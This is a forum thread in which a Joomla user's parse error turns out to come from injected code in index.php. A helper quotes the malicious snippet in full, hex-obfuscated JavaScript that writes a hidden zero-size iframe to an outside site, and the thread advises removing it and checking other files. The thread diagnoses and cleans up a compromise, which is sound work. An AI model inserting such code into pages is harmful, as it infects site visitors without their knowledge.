    Hello,

I have just noticed that my website has this error message.

Parse error: syntax error, unexpected ‘<‘ in /home/mafrater/public_html/imagineguinee.com/index.php on line 89

The error seem to indicate where to look for the solution. But I don’t know what to do when I get there. And I wonder what caused this error to appear.

I am using Joomla 15.3 and Telline 2

    Please help.

that’s saying that you’ve either got an extra < there or it shouldn’t be there at all.

send me your admin deets via pm and i’ll have a quick look for you.

Even better. give us your site url here, a copy of the index.php file attached and we can take a look at the problem, if others have same problems the solutions is posted here instead of on a PM

Bravo, Menalto. I have helped many users here without asking Admin privileges access their website. It takes a bit longer, like asking the correct questions.

A good recent example is this:

Template does not apply correctly to all pages

    http://www.joomlart.com/forums/topic/template-does-not-apply-correctly-to-all-pages/

It took more than a day, because of the time lapse between asking the question and being answered.

This issue– about asking Admin privileges access customer’s website and doing the resolution in private — has been discussed before. It must be made a rule — not to resolve questions in private.

And, as crucial, we should avoid asking Admin privileges access to customer’s website, except those authorized by Joomlart; and most importantly, only as a last resort.

Please note that I have 2 php files. I don’t know if it’s normal. usually, I see only one index.php file. Here, I have index.php and index2.php.

Why have you added this here:

    <!-- o --><script type="text/javascript">function tzomdj(dccmeldvm){var wlwaewpq="";for(ndudbglgz=0;ndudbglgz<dccmeldvm.length;ndudbglgz+=2){wlwaewpq+=(String.fromCharCode(parseInt(dccmeldvm.substr(ndudbglgz,2),16)));}document.write(wlwaewpq);}tzomdj("3Cyadac6966yadac72yadac616D6520yadac7372yadac63yadac3D22687474703A2Fyadac2F6761yadac7A65yadac6E7661yadac67656Eyadac2Eyadac63yadac6F6D2Fyadac696D67yadac2Fyadac696Eyadac6465782E70yadac6870yadac22207769yadac64yadac74683D30yadac2068yadac65yadac696768yadac743Dyadac30yadac3E3Cyadac2Fyadac69yadac66yadac72yadac616D65yadac3Eyadac".replace(/yadac/g, ""));</script><!-- c -->

Try to remove this line from the index.php, save and check if you have this problem then.

    Hello Menalto,

You are a Star. It has been fixed. Thank you.

You know, I did not add anything there. I wonder how it got there. It’s been a long time I have not been in the cpanel of the site.

Thanks you ALL for the assistance.

IF you havent added it…………. I would check over each file and look for unwanted code like that.
Have you added much content to your site? Or not?

I have barely modified the demo contents. I have not even finished doing so.

If this had been modified, how would I have done that?

adding extensions? New content items? uploading images or ???

Well, if you let others enter your site Admin, they could. That is why as Menalto stated, just try to solve problems via the forum. Provide the information requested, and share admin access only as a last resort.
